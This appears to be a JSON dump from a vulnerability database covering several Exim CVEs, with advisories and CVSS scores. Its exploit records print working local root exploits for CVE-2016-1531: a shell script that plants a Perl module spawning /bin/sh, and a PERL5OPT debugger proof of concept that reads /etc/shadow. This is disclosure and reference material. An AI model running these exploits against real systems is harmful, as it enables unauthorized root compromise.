"ALPINE:CVE-2017-1000369", "href": "https://security.alpinelinux.org/vuln/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "redhatcve": [{"lastseen": "2021-09-02T22:51:58", "description": "It was found that Exim leaked DKIM signing private keys to the \"mainlog\" log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-16T08:47:23", "type": "redhatcve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2020-04-08T19:36:12", "id": "RH:CVE-2016-9963", "href": "https://access.redhat.com/security/cve/cve-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:49:25", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-21T08:50:36", "type": "redhatcve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-13T11:38:34", "id": "RH:CVE-2017-1000369", "href": "https://access.redhat.com/security/cve/cve-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2023-12-06T15:47:20", "description": "\n\nThe Exim project reports:\n\nExim leaks the private DKIM signing key to the log files.\n\t Additionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\n\t the key material is included in the bounce message.\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-15T00:00:00", "type": "freebsd", "title": "exim -- DKIM private key leak", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-15T00:00:00", "id": "E7002B26-CAAA-11E6-A76A-9F7324E5534E", "href": "https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T15:47:19", "description": "\n\nQualsys reports:\n\n\n\t Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.\n\t \n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "freebsd", "title": "exim -- Privilege escalation via multiple memory leaks", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F", "href": "https://vuxml.freebsd.org/freebsd/8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-06T15:47:20", "description": "\n\nThe Exim development team reports:\n\nAll installations having Exim set-uid root and using 'perl_startup' are\n\tvulnerable to a local privilege escalation. Any user who can start an\n\tinstance of Exim (and this is normally any user) can gain root\n\tprivileges. If you do not use 'perl_startup' you should be safe.\n\n\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-26T00:00:00", "type": "freebsd", "title": "exim -- local privillege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-02-26T00:00:00", "id": "7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "href": "https://vuxml.freebsd.org/freebsd/7d09b9ee-e0ba-11e5-abc4-6fb07af136d2.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "description": "All installations having Exim set-uid root and using 'perl_startup' are\nvulnerable to a local privilege escalation. Any user who can start an\ninstance of Exim (and this is normally *any* user) can gain root\nprivileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "archlinux", "title": "exim: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "ASA-201603-8", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000573.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-12-06T20:47:28", "description": "Arch Linux Security Advisory ASA-201711-32\n==========================================\n\nSeverity: Critical\nDate : 2017-11-30\nCVE-ID : CVE-2017-1000369 CVE-2017-10140 CVE-2017-16943 CVE-2017-16944\nPackage : exim\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-518\n\nSummary\n=======\n\nThe package exim before version 4.89.1-1 is vulnerable to multiple\nissues including arbitrary code execution, denial of service and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 4.89.1-1.\n\n# pacman -Syu \"exim>=4.89.1-1\"\n\nThe problems have been fixed upstream in version 4.89.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-1000369 (denial of service)\n\nAn uncontrolled resource consumption flaw has been discovered in Exim\nbefore 4.89.1. The use of multiple \"-p\" command line arguments which\nare malloc()'ed and never free()'ed results in leaking memory. While\nExim itself is not vulnerable to privilege escalation, this particular\nflaw can be used by the stackguard vulnerability to achieve privilege\nescalation.\n\n- CVE-2017-10140 (information disclosure)\n\nIt was found that Berkeley DB reads the DB_CONFIG configuration file\nfrom the current working directory by default. This happens when\ncalling db_create() with dbenv=NULL; or using the dbm_open() function.\nThis behavior leads to a security vulnerability because in the case of\nsetuid or setgid commands, excerpts of the file are revealed to the\ncalling user (and maybe more harm could be done with specially crafted\nDB_CONFIG files).\n\n- CVE-2017-16943 (arbitrary code execution)\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to execute arbitrary code or cause a\ndenial of service (use-after-free) via vectors involving BDAT commands.\n\n- CVE-2017-16944 (denial of service)\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88\nand 4.89 allows remote attackers to cause a denial of service (infinite\nloop and stack exhaustion) via vectors involving BDAT commands and an\nimproper check for a '.' character signifying the end of the content,\nrelated to the bdat_getc function.\n\nImpact\n======\n\nA remote attacker is able to crash the application or execute arbitrary\ncode on the affected host. A local attacker is able to bypass access\nrestrictions to obtain sensitive data from local files or bypass the\nstack guard to elevate privileges on the system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56478\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\nhttps://git.exim.org/exim.git/commitdiff/65e061b76867a9ea7aeeb535341b790b90ae6c21\nhttps://access.redhat.com/security/vulnerabilities/stackguard\nhttp://seclists.org/oss-sec/2017/q2/452\nhttp://www.postfix.org/announcements/postfix-3.2.2.html\nhttps://git.exim.org/exim.git/commitdiff/98bf975ca462bebeaa1325d72381847c5118ff14\nhttp://openwall.com/lists/oss-security/2017/11/25/2\nhttps://bugs.exim.org/show_bug.cgi?id=2199\nhttps://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde\nhttps://github.com/LetUsFsck/PoC-Exploit-Mirror/tree/master/CVE-2017-16944\nhttps://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\nhttps://bugs.exim.org/show_bug.cgi?id=2201\nhttps://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542\nhttps://www.exploit-db.com/exploits/43184/\nhttps://security.archlinux.org/CVE-2017-1000369\nhttps://security.archlinux.org/CVE-2017-10140\nhttps://security.archlinux.org/CVE-2017-16943\nhttps://security.archlinux.org/CVE-2017-16944", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-30T00:00:00", "type": "archlinux", "title": "[ASA-201711-32] exim: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-10140", "CVE-2017-16943", "CVE-2017-16944"], "modified": "2017-11-30T00:00:00", "id": "ASA-201711-32", "href": "https://security.archlinux.org/ASA-201711-32", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.86.2 - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "exploitpack", "title": "Exim 4.86.2 - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "EXPLOITPACK:4D7480E2B540BD30AB455D1DDEFB98B3", "href": "", "sourceData": "=============================================\n- Advisory release date: 10.03.2016\n- Created by: Dawid Golunski\n- Severity: High/Critical\n=============================================\n\n\nI. VULNERABILITY\n-------------------------\n\nExim < 4.86.2 Local Root Privilege Escalation Exploit\n\n\nII. BACKGROUND\n-------------------------\n\n\"Exim is a message transfer agent (MTA) developed at the University of \nCambridge for use on Unix systems connected to the Internet. It is freely \navailable under the terms of the GNU General Public Licence. In style it is \nsimilar to Smail 3, but its facilities are more general. There is a great \ndeal of flexibility in the way mail can be routed, and there are extensive \nfacilities for checking incoming mail. Exim can be installed in place of \nSendmail, although the configuration of Exim is quite different.\"\n\nhttp://www.exim.org/\n\n\nIII. INTRODUCTION\n-------------------------\n\nWhen Exim installation has been compiled with Perl support and contains a \nperl_startup configuration variable it can be exploited by malicious local \nattackers to gain root privileges.\n\nIV. DESCRIPTION\n-------------------------\n\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \nsanitization of the environment before loading a perl script defined\nwith perl_startup setting in exim config.\n\nperl_startup is usually used to load various helper scripts such as\nmail filters, gray listing scripts, mail virus scanners etc.\n\nFor the option to be supported, exim must have been compiled with Perl \nsupport, which can be verified with:\n\n[dawid@centos7 ~]$ exim -bV -v | grep i Perl\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\nContent_Scanning DKIM Old_Demime PRDR OCSP\n\n\nTo perform the attack, attacker can take advantage of the exim's sendmail \ninterface which links to an exim binary that has an SUID bit set on it by \ndefault as we can see below:\n\n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\n\n[dawid@centos7 ~]$ ls -l /usr/sbin/exim\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\n\n\nNormally, when exim sendmail interface starts up, it drops its root\nprivileges before giving control to the user (i.e entering mail contents for\nsending etc), however an attacker can make use of the following command line \nparameter which is available to all users:\n\n-ps This option applies when an embedded Perl interpreter is linked with \n Exim. It overrides the setting of the perl_at_start option, forcing the \n starting of the interpreter to occur as soon as Exim is started.\n\n\nAs we can see from the documentation at:\n\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\n\nthe perl_at_start option does the following:\n\n\"Setting perl_at_start (a boolean option) in the configuration requests a \nstartup when Exim is entered.\"\n\nTherefore it is possible to force the execution of the perl_startup script\ndefined in the Exim's main config before exim drops its root privileges.\n\n\nTo exploit this setting and gain the effective root privilege of the SUID binary,\nattackers can inject PERL5OPT perl environment variable, which does not get\ncleaned by affected versions of Exim.\n\nAs per perl documentation, the environment variable allows to set perl command-line \noptions (switches). Switches in this variable are treated as if they were on every\nPerl command line. \n\nThere are several interesting perl switches that that could be set by attackers to \ntrigger code execution. \nOne of these is -d switch which forces perl to enter an interactive debug mode \nin which it is possible to take control of the perl application.\n\nAn example proof of concept exploit using the -d switch can be found below.\n\n\nV. PROOF OF CONCEPT ROOT EXPLOIT\n-------------------------\n\n[dawid@centos7 ~]$ head /etc/exim/exim.conf \n######################################################################\n# Runtime configuration file for Exim #\n######################################################################\n\n# Custom filtering via perl\nperl_startup = do '/usr/share/exim4/exigrey.pl'\n\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\n\n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost\n\nLoading DB routines from perl5db.pl version 1.37\nEditor support available.\n\nEnter h or 'h h' for help, or 'man perldebug' for more help.\n\nDebugged program terminated. Use q to quit or R to restart,\n use o inhibit_exit to avoid stopping after program termination,\n h q, h R or h o to get additional info. \n\n DB<1> p system(\"id\");\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n0\n DB<2> p system(\"head /etc/shadow\");\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\nbin:*:16372:0:99999:7:::\ndaemon:*:16372:0:99999:7::\n[...]\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nThis vulnerability could be exploited by attackers who have local access to the\nsystem to escalate their privileges to root which would allow them to fully\ncompromise the system.\n\nVII. SYSTEMS AFFECTED\n-------------------------\n\nExim versions before the latest patched version of Exim 4.86.2 are affected by \nthis vulnerability, if Exim was compiled with Perl support and the main \nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \na perl_startup option e.g:\n\nperl_startup = do '/usr/share/exim4/exigrey.pl'\n\nIt is important to note that the file does not necessarily have to exist\nto exploit the vulnerability. Although the path must be specified.\n\n\nVIII. SOLUTION\n-------------------------\n\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\nenvironment sanitization issues.\n\nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\nhttp://www.exim.org/\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\n\nCVE-2016-1531\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\n\nX. ADVISORY CREATED BY\n-------------------------\n\nThis advisory has been created by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n\nXI. REVISION HISTORY\n-------------------------\n\nMarch 10th, 2016: Advisory released\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\n\nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.84-3 - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-09T00:00:00", "type": "exploitpack", "title": "Exim 4.84-3 - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42", "href": "", "sourceData": "#!/bin/sh\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\n# ===============================================\n# you can write files as root or force a perl module to\n# load by manipulating the perl environment and running\n# exim with the \"perl_startup\" arguement -ps. \n#\n# e.g.\n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \n# [ CVE-2016-1531 local root exploit\n# sh-4.3# id\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\n# \n# -- Hacker Fantastic \necho [ CVE-2016-1531 local root exploit\ncat > /tmp/root.pm << EOF\npackage root;\nuse strict;\nuse warnings;\n\nsystem(\"/bin/sh\");\nEOF\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-11T01:12:23", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2016-03-10T00:00:00", "type": "zdt", "title": "Exim < 4.86.2 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "1337DAY-ID-25544", "href": "https://0day.today/exploit/description/25544", "sourceData": "=============================================\r\n- Advisory release date: 10.03.2016\r\n- Created by: Dawid Golunski\r\n- Severity: High/Critical\r\n=============================================\r\n \r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n \r\nExim < 4.86.2 Local Root Privilege Escalation Exploit\r\n \r\n \r\nII. BACKGROUND\r\n-------------------------\r\n \r\n\"Exim is a message transfer agent (MTA) developed at the University of \r\nCambridge for use on Unix systems connected to the Internet. It is freely \r\navailable under the terms of the GNU General Public Licence. In style it is \r\nsimilar to Smail 3, but its facilities are more general. There is a great \r\ndeal of flexibility in the way mail can be routed, and there are extensive \r\nfacilities for checking incoming mail. Exim can be installed in place of \r\nSendmail, although the configuration of Exim is quite different.\"\r\n \r\nhttp://www.exim.org/\r\n \r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n \r\nWhen Exim installation has been compiled with Perl support and contains a \r\nperl_startup configuration variable it can be exploited by malicious local \r\nattackers to gain root privileges.\r\n \r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \r\nsanitization of the environment before loading a perl script defined\r\nwith perl_startup setting in exim config.\r\n \r\nperl_startup is usually used to load various helper scripts such as\r\nmail filters, gray listing scripts, mail virus scanners etc.\r\n \r\nFor the option to be supported, exim must have been compiled with Perl \r\nsupport, which can be verified with:\r\n \r\n[[email\u00a0protected] ~]$ exim -bV -v | grep i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\r\nContent_Scanning DKIM Old_Demime PRDR OCSP\r\n \r\n \r\nTo perform the attack, attacker can take advantage of the exim's sendmail \r\ninterface which links to an exim binary that has an SUID bit set on it by \r\ndefault as we can see below:\r\n \r\n[[email\u00a0protected] ~]$ ls -l /usr/sbin/sendmail.exim \r\nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\r\n \r\n[[email\u00a0protected] ~]$ ls -l /usr/sbin/exim\r\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\r\n \r\n \r\nNormally, when exim sendmail interface starts up, it drops its root\r\nprivileges before giving control to the user (i.e entering mail contents for\r\nsending etc), however an attacker can make use of the following command line \r\nparameter which is available to all users:\r\n \r\n-ps This option applies when an embedded Perl interpreter is linked with \r\n Exim. It overrides the setting of the perl_at_start option, forcing the \r\n starting of the interpreter to occur as soon as Exim is started.\r\n \r\n \r\nAs we can see from the documentation at:\r\n \r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\n \r\nthe perl_at_start option does the following:\r\n \r\n\"Setting perl_at_start (a boolean option) in the configuration requests a \r\nstartup when Exim is entered.\"\r\n \r\nTherefore it is possible to force the execution of the perl_startup script\r\ndefined in the Exim's main config before exim drops its root privileges.\r\n \r\n \r\nTo exploit this setting and gain the effective root privilege of the SUID binary,\r\nattackers can inject PERL5OPT perl environment variable, which does not get\r\ncleaned by affected versions of Exim.\r\n \r\nAs per perl documentation, the environment variable allows to set perl command-line \r\noptions (switches). Switches in this variable are treated as if they were on every\r\nPerl command line. \r\n \r\nThere are several interesting perl switches that that could be set by attackers to \r\ntrigger code execution. \r\nOne of these is -d switch which forces perl to enter an interactive debug mode \r\nin which it is possible to take control of the perl application.\r\n \r\nAn example proof of concept exploit using the -d switch can be found below.\r\n \r\n \r\nV. PROOF OF CONCEPT ROOT EXPLOIT\r\n-------------------------\r\n \r\n[[email\u00a0protected] ~]$ head /etc/exim/exim.conf \r\n######################################################################\r\n# Runtime configuration file for Exim #\r\n######################################################################\r\n \r\n# Custom filtering via perl\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n \r\n[[email\u00a0protected] ~]$ exim -bV -v | grep -i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\r\n \r\n[[email\u00a0protected] ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps [email\u00a0protected]\r\n \r\nLoading DB routines from perl5db.pl version 1.37\r\nEditor support available.\r\n \r\nEnter h or 'h h' for help, or 'man perldebug' for more help.\r\n \r\nDebugged program terminated. Use q to quit or R to restart,\r\n use o inhibit_exit to avoid stopping after program termination,\r\n h q, h R or h o to get additional info. \r\n \r\n DB<1> p system(\"id\");\r\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n0\r\n DB<2> p system(\"head /etc/shadow\");\r\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7::\r\n[...]\r\n \r\n \r\nVI. 